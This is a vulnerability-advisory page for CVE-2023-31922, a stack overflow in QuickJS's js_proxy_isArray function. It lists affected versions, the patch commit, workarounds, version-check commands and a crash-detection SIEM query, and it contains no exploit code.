Login Sign Up

CVE-2023-31922

7.5 HIGH
Denial of Service

📋 TL;DR

CVE-2023-31922 is a stack overflow vulnerability in QuickJS's js_proxy_isArray function that can lead to denial of service or potential remote code execution. This affects any application or system using vulnerable versions of the QuickJS JavaScript engine. Developers embedding QuickJS and users of applications built with it are at risk.

💻 Affected Systems

Products:
  • QuickJS JavaScript Engine
Versions: Versions before commit 2788d71 in the QuickJS repository
Operating Systems: All platforms where QuickJS runs (Linux, Windows, macOS, etc.)
Default Config Vulnerable: ⚠️ Yes
Notes: Any application embedding QuickJS or using it as a JavaScript runtime is affected if using vulnerable versions.

📦 What is this software?

Quickjs by Quickjs Project

View all CVEs affecting Quickjs →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution allowing full system compromise if the stack overflow can be leveraged for arbitrary code execution.

🟠

Likely Case

Denial of service causing application crashes or instability when processing malicious JavaScript.

🟢

If Mitigated

Limited impact with proper sandboxing and memory protection mechanisms in place.

🌐 Internet-Facing: HIGH - QuickJS is often used in server-side JavaScript execution contexts that may process untrusted code.
🏢 Internal Only: MEDIUM - Internal applications using QuickJS could still be vulnerable to malicious inputs.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The vulnerability is in a core function and can be triggered by crafted JavaScript input. Public GitHub issues demonstrate the crash condition.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: QuickJS commit 2788d71 and later

Vendor Advisory: https://github.com/bellard/quickjs/issues/178

Restart Required: Yes

Instructions:

1. Update QuickJS to commit 2788d71 or later from the official repository. 2. Recompile any applications using QuickJS with the updated version. 3. Restart affected services.

🔧 Temporary Workarounds

Input Validation

all

Implement strict input validation for JavaScript code processed by QuickJS

Memory Limit Configuration

all

Configure memory limits and stack protection if available in your QuickJS integration

🧯 If You Can't Patch

  • Isolate QuickJS execution in containers or sandboxes with limited privileges
  • Implement network segmentation to limit access to systems using QuickJS

🔍 How to Verify

Check if Vulnerable:

Check QuickJS version or commit hash. If using git: git log --oneline | grep -i '2788d71'

Check Version:

For compiled applications: strings binary_name | grep -i quickjs || check build configuration

Verify Fix Applied:

Verify QuickJS is at commit 2788d71 or later: git rev-parse HEAD

📡 Detection & Monitoring

Log Indicators:

  • Application crashes with segmentation faults
  • Stack overflow errors in application logs
  • Abnormal termination of QuickJS processes

Network Indicators:

  • Unusual JavaScript payloads being sent to services using QuickJS

SIEM Query:

process_name:"quickjs" AND (event_type:"crash" OR error_message:"stack overflow")

📊 Metadata

CVE ID: CVE-2023-31922
CVSS v3 Score: 7.5 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-787
Published: May 12, 2023
Last Updated: January 24, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-31922, you might also want to check these:

CVE-2022-43604 10.0

CVE-2022-43604 is a critical out-of-bounds write vulnerability in the OpENer EtherNet/IP stack that ...

Same vulnerability type (CWE-787)
CVE-2025-24201 10.0

This critical vulnerability allows malicious web content to break out of the Web Content sandbox via...

Same vulnerability type (CWE-787)
CVE-2020-14871 10.0

This is a critical buffer overflow vulnerability (CWE-787) in Oracle Solaris's Pluggable Authenticat...

Same vulnerability type (CWE-787)